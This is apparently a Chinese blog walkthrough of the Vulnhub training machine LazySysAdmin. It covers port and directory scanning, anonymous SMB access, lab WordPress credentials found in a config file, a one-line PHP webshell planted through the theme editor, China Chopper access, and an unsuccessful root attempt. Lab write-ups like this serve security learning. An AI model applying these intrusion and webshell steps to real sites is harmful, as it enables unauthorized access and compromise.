Vulnhub靶机实战-Lazysysadmin

声明

好好学习,天天向上

搭建

使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A

Vulnhub靶机实战-Lazysysadmin_第1张图片

有意思,开启端口不少

发现开启80,22,139,445,3306,6667

访问80

http://192.168.239.15

扫描目录

python3 dirsearch.py -u http://192.168.239.15

扫描结果

info.php
phpmyadmin
wordpress
wordpress/wp-admin
robots.txt

当然优点拿robots.txt开刀了

http://192.168.239.15/robots.txt

发现四个目录

/old/
/test/
/TR2/
/Backnode_files/

Vulnhub靶机实战-Lazysysadmin_第2张图片

看了个寂寞,看看445吧,扫描445发现允许匿名访问

enum4linux 192.168.239.15

Vulnhub靶机实战-Lazysysadmin_第3张图片

windows下,把共享添加到k盘

net use k: \\192.168.239.15\share$

Vulnhub靶机实战-Lazysysadmin_第4张图片

查看一下wordpress的配置文件,看到数据库账号密码 Admin/TogieMYSQL12345^^

Vulnhub靶机实战-Lazysysadmin_第5张图片

登入wordpress/wp-admin

http://192.168.239.15/wordpress/wp-admin
Admin
TogieMYSQL12345^^

老样子,编辑器主题编辑Editor写入一句话

404


Vulnhub靶机实战-Lazysysadmin_第6张图片

访问

http://192.168.239.15/wordpress/wp-content/themes/twentyfifteen/404.php?1=phpinfo();

Vulnhub靶机实战-Lazysysadmin_第7张图片

菜刀连接

Vulnhub靶机实战-Lazysysadmin_第8张图片

查看文件deets.txt,发现密码123456提示

Vulnhub靶机实战-Lazysysadmin_第9张图片

查看home目录发现账户togie

Vulnhub靶机实战-Lazysysadmin_第10张图片

ssh登录togie

ssh [email protected]
123456

难受,我这里ssh连接失败,不知道大佬是怎么连上的,我这里只能获取www的权限

最后使用wordpress的php代码执行只拿到了www的权限
使用msf生成的木马
难受+耻辱

你可能感兴趣的:(靶场,vulnhub,渗透测试,靶机实战)